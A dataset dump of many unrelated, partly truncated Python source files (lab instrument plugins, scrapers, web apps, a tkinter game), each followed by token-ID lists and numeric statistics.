help="tokenizer for dpr encoder",
)
parser.add_argument(
"--index_path",
default=None,
type=str,
help="Path to the indexes of contexts",
)
parser.add_argument(
"--sparse_index",
default=None,
type=str,
help="Path to the indexes of sarse tokenizer, required when using dense index, in order to retrieve the raw document",
)
parser.add_argument(
"--model_name_or_path",
default=None,
type=str,
help="Path to pretrained model or model identifier from huggingface.co/models",
)
parser.add_argument(
"--tokenizer_name",
default=None,
type=str,
help="Pretrained tokenizer name or path if not the same as model_name",
)
parser.add_argument(
"--output",
default=None,
type=str,
help="The output file where the runs results will be written to",
)
parser.add_argument(
"--output_nbest_file",
default=None,
type=str,
help="The output file for store nbest results temporarily",
)
parser.add_argument(
"--language",
default="en",
type=str,
help="The language of task",
)
parser.add_argument(
"--eval_batch_size",
default=32,
type=int,
help="batch size for evaluation",
)
parser.add_argument(
"--topk",
default=10,
type=int,
help="The number of contexts retrieved for a question",
)
parser.add_argument(
"--support_no_answer",
action="store_true",
help="support no answer prediction",
)
parser.add_argument(
"--strip_accents",
action="store_true",
help="script accents for questions",
)
args = parser.parse_args() | [
11748,
1822,
29572,
198,
198,
48610,
796,
1822,
29572,
13,
28100,
1713,
46677,
3419,
198,
198,
48610,
13,
2860,
62,
49140,
7,
198,
220,
220,
220,
366,
438,
25202,
1600,
198,
220,
220,
220,
4277,
2625,
36166,
1600,
198,
220,
220,
220,
... | 2.535604 | 969 |
"""
"Hello world" example
for solving SLE (system of linear equations)
"""
from FuncDesigner import *
# create some variables
a, b, c = oovars('a', 'b', 'c')
# or just a, b, c = oovars(3)
# Python list of 3 linear equations with 3 variables
f = [2*a+3*b-2*c+5, 2*a+13*b+15, a+4*b+2*c-45]
# alternatively, you could pass equations:
#f = [2*a+3*b-2*c==-5, 2*a+15==-13*b, a==-4*b-2*c+45]
# assign SLE
linSys = sle(f)
r = linSys.solve()
A, B, C = r(a, b, c)
maxRes = r.ff # max residual
print(A, B, C, maxRes)
# Expected result:
# (array([ 25.]), array([-5.]), array([ 20.]), 7.1054273576010019e-15)
| [
37811,
198,
1,
15496,
995,
1,
1672,
220,
198,
1640,
18120,
311,
2538,
357,
10057,
286,
14174,
27490,
8,
198,
37811,
198,
6738,
11138,
66,
23067,
263,
1330,
1635,
198,
198,
2,
2251,
617,
9633,
198,
64,
11,
275,
11,
269,
796,
267,
7... | 2.181159 | 276 |
from abc import abstractmethod
from candy_editor.core import EditorModule
from candy_editor.qt.controls.Menu import MenuManager
from candy_editor.qt.controls.ToolBar import ToolBarManager, ToolBarItem
from PyQt5 import QtGui, QtWidgets
from PyQt5.QtCore import Qt
##----------------------------------------------------------------##
_QT_SETTING_FILE = 'qt.ini'
##----------------------------------------------------------------##
| [
6738,
450,
66,
1330,
12531,
24396,
198,
198,
6738,
18550,
62,
35352,
13,
7295,
1330,
12058,
26796,
198,
6738,
18550,
62,
35352,
13,
39568,
13,
13716,
82,
13,
23381,
1330,
21860,
13511,
198,
6738,
18550,
62,
35352,
13,
39568,
13,
13716,
... | 4.065421 | 107 |
from pymodaq.daq_move.utility_classes import DAQ_Move_base
from pymodaq.daq_move.utility_classes import comon_parameters
from pymodaq.daq_utils.daq_utils import ThreadCommand
from easydict import EasyDict as edict
from ..hardware.smaract.smaract import SmarAct
from ..hardware.smaract.smaract import get_controller_locators
class DAQ_Move_SmarActMCS(DAQ_Move_base):
"""
This plugin supports only SmarAct LINEAR positionners (SLC type), with
enabled sensors attached to them.
We suppose to have one (or multiple) MCS controllers connected. With 3
channels (each).
We suppose that the configuration of the controllers (sensor type etc) has
been done via the SmarAct MCS Configuration software.
Tested with one SLC-1740-S (closed loop with nanometer precision sensor)
connected via a MCS-3S-EP-SDS15-TAB (sensor module) to a MCS-3D (or MCS-3C)
controller on Windows 7.
"""
_controller_units = "µm"
# find controller locators
controller_locators = get_controller_locators()
is_multiaxes = True
# we suppose to have a MCS controller with 3 channels (like the MCS-3D).
stage_names = [0, 1, 2]
# bounds corresponding to the SLC-24180
min_bound = -61500 # µm
max_bound = +61500 # µm
offset = 0 # µm
params = [
{
"title": "group parameter:",
"name": "group_parameter",
"type": "group",
"children": [
{
"title": "Controller Name:",
"name": "smaract_mcs",
"type": "str",
"value": "SmarAct MCS controller",
"readonly": True,
},
{
"title": "Controller locator",
"name": "controller_locator",
"type": "list",
"values": controller_locators,
},
],
},
##########################################################
# the ones below should ALWAYS be present!!!
{
"title": "MultiAxes:",
"name": "multiaxes",
"type": "group",
"visible": is_multiaxes,
"children": [
{
"title": "is Multiaxes:",
"name": "ismultiaxes",
"type": "bool",
"value": is_multiaxes,
"default": False,
},
{
"title": "Status:",
"name": "multi_status",
"type": "list",
"value": "Master",
"values": ["Master", "Slave"],
},
{
"title": "Axis:",
"name": "axis",
"type": "list",
"values": stage_names,
},
],
},
] + comon_parameters
##########################################################
def ini_stage(self, controller=None):
"""Initialize the controller and stages (axes) with given parameters.
Parameters
----------
controller (object): custom object of a PyMoDAQ plugin (Slave case).
None if only one actuator by controller (Master case)
Returns
-------
self.status: (edict) with initialization status: three fields:
* info: (str)
* controller: (object) initialized controller
* initialized: (bool) False if initialization failed otherwise
True
"""
try:
# initialize the stage and its controller status
# controller is an object that may be passed to other instances of
# DAQ_Move_Mock in case of one controller controlling
# multiactuators (or detector)
self.status.update(edict(
info="", controller=None, initialized=False))
# check whether this stage is controlled by a multiaxe controller
# (to be defined for each plugin)
# if multiaxes then init the controller here if Master state
# otherwise use external controller
if self.settings.child('multiaxes',
'ismultiaxes').value() \
and self.settings.child('multiaxes',
'multi_status').value() == "Slave":
if controller is None:
raise Exception('No controller has been defined externally'
' while this axe is a slave one')
else:
self.controller = controller
else: # Master stage
self.controller = SmarAct()
self.controller.init_communication(
self.settings.child("group_parameter",
"controller_locator").value()
)
# min and max bounds will depend on which positionner is plugged.
# Anyway the bounds are secured by the library functions.
self.settings.child("bounds", "is_bounds").setValue(True)
self.settings.child("bounds", "min_bound").setValue(self.min_bound)
self.settings.child("bounds", "max_bound").setValue(self.max_bound)
self.settings.child("scaling", "use_scaling").setValue(True)
self.settings.child("scaling", "offset").setValue(self.offset)
self.status.controller = self.controller
self.status.initialized = True
return self.status
except Exception as e:
self.emit_status(ThreadCommand("Update_Status", [str(e), "log"]))
self.status.info = str(e)
self.status.initialized = False
return self.status
def close(self):
"""Close the communication with the SmarAct controller.
"""
self.controller.close_communication()
self.controller = None
def check_position(self):
"""Get the current position from the hardware with scaling conversion.
Returns
-------
float: The position obtained after scaling conversion.
"""
position = self.controller.get_position(
self.settings.child("multiaxes", "axis").value()
)
# the position given by the controller is in nanometers, we convert in
# micrometers
position = float(position) / 1e3
# convert position if scaling options have been used, mandatory here
position = self.get_position_with_scaling(position)
self.current_position = position
self.emit_status(ThreadCommand("check_position", [position]))
return position
def move_Abs(self, position):
"""Move to an absolute position
Parameters
----------
position: float
"""
# limit position if bounds options has been selected and if position is
# out of them
position = self.check_bound(position)
self.target_position = position
# convert the user set position to the controller position if scaling
# has been activated by user
position = self.set_position_with_scaling(position)
# we convert position in nm
position = int(position * 1e3)
# the SmarAct controller asks for nanometers
self.controller.absolute_move(
self.settings.child("multiaxes", "axis").value(), position
)
# start polling the position until the actuator reach the target
# position within epsilon
# defined as a parameter field (comon_parameters)
self.poll_moving()
def move_Rel(self, position):
"""Move to a relative position
Parameters
----------
position: float
"""
# limit position if bounds options has been selected and if position is
# out of them
position = (
self.check_bound(self.current_position + position)
- self.current_position)
self.target_position = position + self.current_position
# convert the user set position to the controller position if scaling
# has been activated by user
position = self.set_position_with_scaling(position)
# we convert position in nm
position = int(position * 1e3)
# the SmarAct controller asks for nanometers
self.controller.relative_move(
self.settings.child("multiaxes", "axis").value(), position
)
self.poll_moving()
def move_Home(self):
"""Move to home and reset position to zero.
"""
self.controller.find_reference(
self.settings.child("multiaxes", "axis").value())
def stop_motion(self):
"""
See Also
--------
DAQ_Move_base.move_done
"""
self.controller.stop(self.settings.child("multiaxes", "axis").value())
self.move_done()
if __name__ == "__main__":
test = DAQ_Move_SmarActMCS()
| [
6738,
12972,
4666,
30188,
13,
48539,
62,
21084,
13,
315,
879,
62,
37724,
1330,
17051,
48,
62,
21774,
62,
8692,
198,
6738,
12972,
4666,
30188,
13,
48539,
62,
21084,
13,
315,
879,
62,
37724,
1330,
401,
261,
62,
17143,
7307,
198,
6738,
... | 2.221441 | 4,123 |
from transformers import AutoTokenizer, AutoModel
import random
import torch
import torch.nn.functional as F
from tqdm import tqdm
import re
from typing import Optional, Callable
# Returns the index of the masked token. after applying the model's tokenizer.
| [
6738,
6121,
364,
1330,
11160,
30642,
7509,
11,
11160,
17633,
198,
11748,
4738,
198,
11748,
28034,
198,
11748,
28034,
13,
20471,
13,
45124,
355,
376,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
198,
11748,
302,
198,
198,
6738,
19720... | 3.910448 | 67 |
# mlf_to_csv.py
# grabs mlf from the data/mlfs directory and creates a csv in
# in the data/csvs directory with the date
from subprocess import call
import csv
import re
natives = open('data/FWOA.txt').readlines()
natives = [x.strip() for x in natives]
foreigners = open('data/FWA.txt').readlines()
foreigners = [x.strip() for x in foreigners]
NUM_TRANSCRIPTS = 4
for i in range(NUM_TRANSCRIPTS):
csv_filename = 'data/csvs/transcript_%d.csv' % (i+1)
csv_file = open(csv_filename, 'wb')
csv_writer = csv.writer(csv_file,delimiter = ',')
for native in natives:
csv_writer.writerow('')
row_string = ['person', '%s' % native]
filename = 'data/mlfs/native/%s_%d.mlf' % (native, i+1)
mlf_data = open(filename).readlines()
pattern = re.compile('\d*\s\d*\s(.*)\s(\d*\.\d*)\s?(\w*)')
for row in mlf_data:
m = pattern.match(row)
if m:
if m.group(3):
csv_writer.writerow(row_string)
row_string = []
row_string.append(m.group(3))
row_string.append(m.group(1))
row_string.append(m.group(2))
csv_writer.writerow(row_string)
for i in range(NUM_TRANSCRIPTS):
csv_filename = 'data/csvs/transcript_foreigner_%d.csv' % (i+1)
csv_file = open(csv_filename, 'wb')
csv_writer = csv.writer(csv_file,delimiter = ',')
for foreigner in foreigners:
csv_writer.writerow('')
row_string = ['person', '%s' % foreigner]
filename = 'data/mlfs/foreign/%s_%d.mlf' % (foreigner, i+1)
try:
mlf_data = open(filename).readlines()
except:
print "missing filename: ", filename
continue
pattern = re.compile('\d*\s\d*\s(.*)\s(\d*\.\d*)\s?(\w*)')
for row in mlf_data:
m = pattern.match(row)
if m:
if m.group(3):
csv_writer.writerow(row_string)
row_string = []
row_string.append(m.group(3))
row_string.append(m.group(1))
row_string.append(m.group(2))
csv_writer.writerow(row_string)
| [
2,
285,
1652,
62,
1462,
62,
40664,
13,
9078,
198,
2,
22378,
285,
1652,
422,
262,
1366,
14,
76,
1652,
82,
8619,
290,
8075,
257,
269,
21370,
287,
220,
198,
2,
287,
262,
1366,
14,
6359,
14259,
8619,
351,
262,
3128,
198,
198,
6738,
... | 2.265945 | 831 |
import subprocess
from sys import stderr
from typing import Any, Dict, List
from pathlib import Path
import mimetypes
import os
import json
from sphinx.builders.dirhtml import DirectoryHTMLBuilder
from sphinx.builders.html import StandaloneHTMLBuilder
from sphinx.builders.linkcheck import CheckExternalLinksBuilder
from sphinx.application import Sphinx
from sphinx.errors import ConfigError
from docutils import nodes
from urllib.parse import urljoin
from sphinx.util import logging
logger = logging.getLogger(__name__)
READTHEDOCS_BUILDERS = ["readthedocs", "readthedocsdirhtml"]
# verify workbox exists or is installed
# if it is not, install it
| [
11748,
850,
14681,
201,
198,
6738,
25064,
1330,
336,
1082,
81,
201,
198,
6738,
19720,
1330,
4377,
11,
360,
713,
11,
7343,
201,
198,
6738,
3108,
8019,
1330,
10644,
201,
198,
11748,
17007,
2963,
12272,
201,
198,
11748,
28686,
201,
198,
... | 3.053097 | 226 |
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
Create a CSV with each race since 1990, with the rid and the Wikidata qid.
"""
import os
import requests
from bs4 import BeautifulSoup
import re
import csv
race_qids= {}
root_dir = os.environ['HOME'] + "/Dropbox/finnmarkslopet/"
with open(root_dir + 'finnmarkslopet-qid-temp.csv', 'r') as csv_in:
reader = csv.reader(csv_in)
for row in reader:
race_qids[row[1]] = row[0]
csv_in.closed
root_url = 'http://www.finnmarkslopet.no'
index_url = root_url + '/rhist/results.jsp?lang=en'
response = requests.get(index_url)
soup = BeautifulSoup(response.text)
table = soup.select('.winners tr')
table.pop(0)
with open(root_dir + 'finnmarkslopet-qid.csv', 'w') as csv_out:
fieldnames = ["race", "rid", "qid"]
writer = csv.DictWriter(csv_out, fieldnames=fieldnames)
writer.writeheader()
for row in table:
year = row.strong.string
links = row.find_all("a")
writer.writerow({
'race': year + ' FL1000',
'rid': re.search("openRaceWnd\('(?P<id>[0-9]*)'\)", links[0].get('href')).group("id"),
'qid':race_qids[year + " FL1000"]
});
if len(links) > 1:
writer.writerow({
'race': year + ' FL500',
'rid': re.search("openRaceWnd\('(?P<id>[0-9]*)'\)", links[1].get('href')).group("id"),
'qid':race_qids[year + " FL500"]
});
if len(links) == 3:
writer.writerow({
'race': year + ' FL Junior',
'rid': re.search("openRaceWnd\('(?P<id>[0-9]*)'\)", links[2].get('href')).group("id"),
'qid':race_qids[year + " FL Junior"]
});
csv_out.closed | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
41002,
12,
23,
532,
9,
12,
198,
198,
37811,
198,
16447,
257,
44189,
351,
1123,
3234,
1201,
6303,
11,
351,
262,
5755,
290,
262,
11145,
312,
1045,
10662... | 2.286776 | 673 |
import unittest
from zeppos_mail.email import Email
if __name__ == '__main__':
unittest.main()
| [
11748,
555,
715,
395,
198,
6738,
41271,
381,
418,
62,
4529,
13,
12888,
1330,
9570,
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
555,
715,
395,
13,
12417,
3419,
198
] | 2.615385 | 39 |
from __future__ import absolute_import
from __future__ import unicode_literals
from testinfra.utils.ansible_runner import AnsibleRunner
import os
import pytest
import logging
import testinfra.utils.ansible_runner
import collections
logging.basicConfig(level=logging.DEBUG)
# # DEFAULT_HOST = 'all'
VAR_FILE = "../../vars/main.yml"
TESTINFRA_HOSTS = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
inventory = os.environ['MOLECULE_INVENTORY_FILE']
runner = AnsibleRunner(inventory)
# runner.get_hosts(DEFAULT_HOST)
@pytest.fixture()
@pytest.fixture
@pytest.fixture
# def test_sudo_from_root(host, ansible_variables):
# dict_variables = converttostr(ansible_variables)
# myuser = dict_variables['system_username']
# assert host.user().name == "root"
# with host.sudo(myuser):
# assert host.user().name == myuser
# assert host.user().name == "root"
# def test_sudo_fail_from_root(host, ansible_variables):
# dict_variables = converttostr(ansible_variables)
# myuser = dict_variables['system_username']
# #assert host.user().name == "root"
# with pytest.raises(AssertionError) as exc:
# with host.sudo(myuser):
# assert host.user(myuser).name == myuser
# host.check_output('ls /root/invalid')
# assert str(exc.value).startswith('Unexpected exit code')
# #with host.sudo():
# # assert host.user().name == "root"
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
6738,
11593,
37443,
834,
1330,
28000,
1098,
62,
17201,
874,
198,
6738,
1332,
10745,
430,
13,
26791,
13,
504,
856,
62,
16737,
1330,
28038,
856,
49493,
198,
11748,
28686,
198,
11748,
12... | 2.503378 | 592 |
from distutils import command
from tkinter import *
import time
import Validacion
import Datos
import os
import shutil
from tkinter import messagebox
from tkinter import ttk
from tkinter.filedialog import askopenfilename
from tkinter import filedialog
from distutils import command
import shutil
from tkinter import messagebox
from tkinter import ttk
from tkinter.filedialog import askopenfilename
from tkinter import Label,Tk
from PIL import Image, ImageTk
from tkinter import filedialog
objeto_validacion=Validacion.validacion()
global lista_de_textbox
lista_de_textbox = list()
#SELECCION DE IMAGEN
fecha=str(time.strftime("%d/%m/%y"))
#CENTRAR VENTANA
def center(win):
"""
centers a tkinter window
:param win: the root or Toplevel window to center
"""
win.update_idletasks()
width = win.winfo_width()
frm_width = win.winfo_rootx() - win.winfo_x()
win_width = width + 2 * frm_width
height = win.winfo_height()
titlebar_height = win.winfo_rooty() - win.winfo_y()
win_height = height + titlebar_height + frm_width
x = win.winfo_screenwidth() // 2 - win_width // 2
y = win.winfo_screenheight() // 2 - win_height // 2
win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
win.deiconify()
#INTERFAZ
hidden = False
ventana = Tk()
#############Objeto validacion
imh12 = PhotoImage(file="azules.png")
fo = Label(ventana, image=imh12, width=980, height=675)
fo.image=imh12
fo.place(x=0, y=0)
genero = StringVar()
titulo = StringVar()
descripcion = StringVar()
duracion = StringVar()
anio = StringVar()
conteliminar = StringVar()
colorFondo = "orange"
colorLetra = "BLACK"
colorBotones = "SpringGreen3"
ventana.title("Image Play")
ventana.geometry("770x675")
ventana.configure(background = colorFondo)
etiquetaTitulo= Label(ventana, text=" Aquí se muestra una pista de la Palabrita",
bg="teal", fg=colorFondo,width=38,font=("", "14")).place(x=20,y=10)
etiquetajug = Label(ventana, text="NOMBRE DEL JUGADOR", bg=colorFondo,
fg=colorLetra,width=40, height=1).place(x=450, y=210)
#---->
cajaju = Entry(ventana, width=47)
cajaju.place(x=450, y=240)
botonInIma = Button(ventana, text="INSERTAR UNA IMAGEN DE TU PC", command=chose, bg=colorBotones, width=39, height=1,
fg=colorLetra).place(x=450, y=60)
etiquetaT1 = Label(ventana, text="NOMBRE DE LA IMAGEN", bg=colorFondo,
fg=colorLetra,width=40, height=1).place(x=450, y=90)
#---->
global cajanombre
cajanombre = Entry(ventana, width=47)
cajanombre.place(x=450, y=120)
etiquetaT2 = Label(ventana, text="DESCRIPCIÓN DE LA IMAGEN", bg=colorFondo,
fg=colorLetra,width=40, height=1).place(x=450, y=150)
#---->
cajadescripcion = Entry(ventana, width=47 )
cajadescripcion.place(x=450, y=180)
etiquetaQUE = Label(ventana, text="¿QUE SE DEBE HACER?", bg=colorFondo,
fg=colorLetra,width=40, height=1).place(x=450, y=290)
#ayuda para jugar básica
txtFrameinstruc = Frame(ventana, borderwidth=1, relief="sunken")
txtinstruc = Text(txtFrameinstruc, wrap = NONE, height = 4, width = 34, borderwidth=1)
vscroll = Scrollbar(txtFrameinstruc, orient=HORIZONTAL, command=txtinstruc.xview)
vscroll01 = Scrollbar(txtFrameinstruc, orient=VERTICAL, command=txtinstruc.yview)
txtinstruc['xscrollcommand'] = vscroll.set
txtinstruc['yscrollcommand'] = vscroll01.set
vscroll.pack(side="bottom", fill="x")
vscroll01.pack(side="right", fill="y")
txtinstruc.pack(side="left", fill="both", expand=True)
txtinstruc.insert(INSERT, "Complete en la parte de abajo el nombre :)\nde la imagen correspondiente para que así vaya\ndestapando la imagen poco a poco :) :) \n\n")
txtFrameinstruc.place(x=450, y=330)
txtinstruc.tag_add("here", "1.0", "7.4")
txtinstruc.tag_add("start", "1.8", "1.13")
txtinstruc.tag_config("here", background="black", foreground="white")
txtinstruc.config(state=DISABLED)
etiquetaT3 = Label(ventana, text="DESCRIPCIÓN DE LA IMAGEN: ", bg=colorFondo,
fg=colorLetra,width=40, height=1)
etiquetaT3.place(x=450, y=430)
#Descripcion de la imagen
etiquetaT4 = Label(ventana, text="ADIVINA: ", bg=colorFondo,
fg=colorLetra,width=40, height=1).place(x=450, y=530)
cajares = Entry(ventana, width=47)
cajares.place(x=450, y=560)
#ADIVINA LA PALABRA
botoFinaliza = Button(ventana, text="FINALIZAR", bg=colorBotones,width=17, height=1,
fg=colorLetra,command=finalizar).place(x=610, y=650)
botoIntentar = Button(ventana, text="INICIAR JUEGO", bg=colorBotones,width=20, height=1,
fg=colorLetra,command=iniciar).place(x=450, y=650)
botonprobar = Button(ventana, text="PROBAR PALABRA INGRESADA", command=probar, bg=colorBotones,width=40, height=1,
fg=colorLetra).place(x=450, y=588)
botonautores = Button(ventana, text="AUTORES", command=autores, bg=colorBotones,width=40, height=1,
fg=colorLetra).place(x=450, y=615)
#REEMPLAZO DE IMAGEN
label_principal=Label(ventana,width=60,height=70)
label_principal.place(x=20,y=60)
label_principal.pack
#imh = PhotoImage(file="descarga.png")
cron = Label(ventana, text="Time:",
fg=colorFondo,font=("", "18")).place(x=590, y=10)
time = Label(ventana, fg='red', width=5, font=("", "18"))
time.place(x=660, y=10)
im=PhotoImage(file="nula.png")
w = Label(ventana,image=im, width=423, height=610)
w.place(x=20, y=60)
im1 = PhotoImage(file="nula.png")
etiqueta1 = Label(ventana, image=im1, width=225, height=200)
etiqueta2 = Label(ventana, image=im1, width=225, height=205)
etiqueta3 = Label(ventana, image=im1, width=200, height=200)
etiqueta4 = Label(ventana, image=im1, width=200, height=200)
etiqueta5 = Label(ventana, image=im1, width=225, height=205)
# this removes the maximize button
ventana.resizable(0,0)
center(ventana)
mainloop()
| [
6738,
1233,
26791,
1330,
3141,
198,
6738,
256,
74,
3849,
1330,
1635,
198,
11748,
640,
198,
11748,
48951,
49443,
198,
11748,
16092,
418,
198,
11748,
28686,
198,
11748,
4423,
346,
198,
6738,
256,
74,
3849,
1330,
3275,
3524,
198,
6738,
256... | 2.311076 | 2,546 |
from bottle import route, run, request, static_file, Bottle, response
import hash_ring
import sys, getopt
import yaml
import os
import requests
import json
from argparse import ArgumentParser
from optparse import OptionParser
import time
import socket
import random
from multiprocessing import Process, Queue
from dxf import *
import rejson, redis, json
app = Bottle()
dbNoBlob = 0
dbNoFile = 1
dbNoBFRecipe = 2
####
# NANNAN: tar the blobs and send back to master.
# maybe ignore.
####
##
# NANNAN: fetch the serverips from redis by using layer digest
##
################################
# NANNAN: forward to registries according to cht
################################
@app.route('/up', method="POST")
if __name__ == "__main__":
main()
| [
6738,
9294,
1330,
6339,
11,
1057,
11,
2581,
11,
9037,
62,
7753,
11,
33608,
11,
2882,
198,
11748,
12234,
62,
1806,
198,
11748,
25064,
11,
651,
8738,
198,
11748,
331,
43695,
198,
11748,
28686,
198,
11748,
7007,
198,
11748,
33918,
198,
6... | 3.294872 | 234 |
"""Handlers that modify and/or filter requests."""
__all__ = [
'RateLimiter',
]
import logging
import math
import time
from g1.bases import collections as g1_collections
from g1.bases.assertions import ASSERT
from .. import consts
from .. import wsgi_apps
LOG = logging.getLogger(__name__)
class RateLimiter:
"""Rate limiter.
When a request arrives, the rate limiter calculates its bucket key
and retrieves (or creates) its corresponding bucket. Then it will
let pass or drop the request depending on the token bucket state.
* The rate limiter can hold at most `num_buckets` token buckets, and
will drop buckets when this number is exceeded.
* By default, all requests needs one token, which can be overridden
with `get_num_needed` callback.
"""
| [
37811,
12885,
8116,
326,
13096,
290,
14,
273,
8106,
7007,
526,
15931,
198,
198,
834,
439,
834,
796,
685,
198,
220,
220,
220,
705,
32184,
19352,
2676,
3256,
198,
60,
198,
198,
11748,
18931,
198,
11748,
10688,
198,
11748,
640,
198,
198,... | 3.233871 | 248 |
from datetime import datetime
import gameball.utils | [
6738,
4818,
8079,
1330,
4818,
8079,
198,
11748,
983,
1894,
13,
26791
] | 4.25 | 12 |
import csv
from datetime import timedelta
from functools import partial
import os
from pubsub import pub
from threading import Lock, Thread
from time import localtime, sleep, time
import wx
from wx.lib.filebrowsebutton import DirBrowseButton
from spacq.interface.pulse.parser import PulseError
from spacq.interface.units import IncompatibleDimensions
from spacq.iteration.sweep import PulseConfiguration, SweepController
from spacq.iteration.variables import sort_output_variables, sort_condition_variables, InputVariable, OutputVariable, ConditionVariable
from spacq.tool.box import flatten, sift
from ..tool.box import Dialog, MessageDialog, YesNoQuestionDialog
class DataCaptureDialog(Dialog, SweepController):
"""
A progress dialog which runs over iterators, sets the corresponding resources, and captures the measured data.
"""
max_value_len = 50 # characters
timer_delay = 50 # ms
stall_time = 2 # s
status_messages = {
None: 'Starting up',
'init': 'Initializing',
'next': 'Getting next values',
'transition': 'Smooth setting',
'write': 'Writing to devices',
'dwell': 'Waiting for resources to settle',
'pulse': 'Running pulse program',
'read': 'Taking measurements',
'condition': 'Testing conditions',
'condition_dwell': 'Waiting for conditions to settle',
'ramp_down': 'Smooth setting',
'end': 'Finishing',
}
def _general_exception_handler(self, f, e):
"""
Called when a trampolined function raises e.
"""
MessageDialog(self.parent, '{0}'.format(str(e)), 'Sweep error in "{0}"'.format(f)).Show()
def _resource_exception_handler(self, resource_name, e, write=True):
"""
Called when a write to or read from a Resource raises e.
"""
msg = 'Resource: {0}\nError: {1}'.format(resource_name, str(e))
dir = 'writing to' if write else 'reading from'
MessageDialog(self.parent, msg, 'Error {0} resource'.format(dir)).Show()
self.abort(fatal=write)
class DataCapturePanel(wx.Panel):
"""
A panel to start the data capture process, optionally exporting the results to a file.
"""
| [
11748,
269,
21370,
198,
6738,
4818,
8079,
1330,
28805,
12514,
198,
6738,
1257,
310,
10141,
1330,
13027,
198,
11748,
28686,
198,
6738,
2240,
7266,
1330,
2240,
198,
6738,
4704,
278,
1330,
13656,
11,
14122,
198,
6738,
640,
1330,
1957,
2435,
... | 3.22327 | 636 |
import os
import asyncio
import agent
from waterbutler.core.streams.base import BaseStream
class PartialFileStreamReader(FileStreamReader):
"""Awful class, used to avoid messing with FileStreamReader. Extends FSR with start and end
byte offsets to indicate a byte range of the file to return. Reading from this stream will
only return the requested range, never data outside of it.
"""
@property
@property
@property
@property
@agent.async_generator
| [
11748,
28686,
198,
11748,
30351,
952,
198,
198,
11748,
5797,
198,
198,
6738,
1660,
4360,
1754,
13,
7295,
13,
5532,
82,
13,
8692,
1330,
7308,
12124,
628,
198,
198,
4871,
43689,
8979,
12124,
33634,
7,
8979,
12124,
33634,
2599,
198,
220,
... | 3.380952 | 147 |
import os
import aiohttp
import aiohttp_jinja2
import jinja2
from aiohttp import web
from gidgethub.aiohttp import GitHubAPI
from check_python_cla.bpo import Status, check_cla
from check_python_cla.exceptions import CheckCLAException
from check_python_cla.github import get_and_update_pending_prs
@web.middleware
async def error_middleware(request, handler):
"""Middlware to render error message using the template renderer."""
try:
response = await handler(request)
except web.HTTPException as ex:
if ex.text:
message = ex.text
else:
message = ex.reason
context = {"error_message": message, "status": ex.status}
response = aiohttp_jinja2.render_template(
"error.html", request, context=context
)
return response
async def handle_get(request):
"""Render a page with a textbox and submit button."""
response = aiohttp_jinja2.render_template("index.html", request, context={})
return response
async def handle_post(request):
"""Check if the user has signed the CLA.
If the user has signed the CLA, and there are still open PRs with `CLA not signed` label,
remove the `CLA not signed` label.
Otherwise, just display a page saying whether user has signed the CLA or not.
"""
data = await request.post()
gh_username = data.get("gh_username", "").strip()
context = {}
template = "index.html"
if len(gh_username) > 0:
async with aiohttp.ClientSession() as session:
try:
cla_result = await check_cla(session, gh_username)
except CheckCLAException as e:
context = {"error_message": e}
else:
context = {"gh_username": gh_username, "cla_result": cla_result}
if cla_result == Status.signed.value:
gh = GitHubAPI(
session, "python/cpython", oauth_token=os.environ.get("GH_AUTH")
)
pending_prs = await get_and_update_pending_prs(gh, gh_username)
if len(pending_prs) > 0:
template = "pull_requests.html"
context["pull_requests"] = pending_prs
response = aiohttp_jinja2.render_template(template, request, context=context)
return response
if __name__ == "__main__": # pragma: no cover
app = web.Application(middlewares=[error_middleware])
aiohttp_jinja2.setup(
app, loader=jinja2.FileSystemLoader(os.path.join(os.getcwd(), "templates"))
)
app["static_root_url"] = os.path.join(os.getcwd(), "static")
port = os.environ.get("PORT")
if port is not None:
port = int(port)
app.add_routes(
[
web.get("/", handle_get),
web.post("/", handle_post),
web.static("/static", os.path.join(os.getcwd(), "static")),
]
)
web.run_app(app, port=port)
| [
11748,
28686,
198,
198,
11748,
257,
952,
4023,
198,
11748,
257,
952,
4023,
62,
18594,
6592,
17,
198,
11748,
474,
259,
6592,
17,
198,
6738,
257,
952,
4023,
1330,
3992,
198,
6738,
308,
17484,
40140,
13,
64,
952,
4023,
1330,
21722,
17614... | 2.311668 | 1,277 |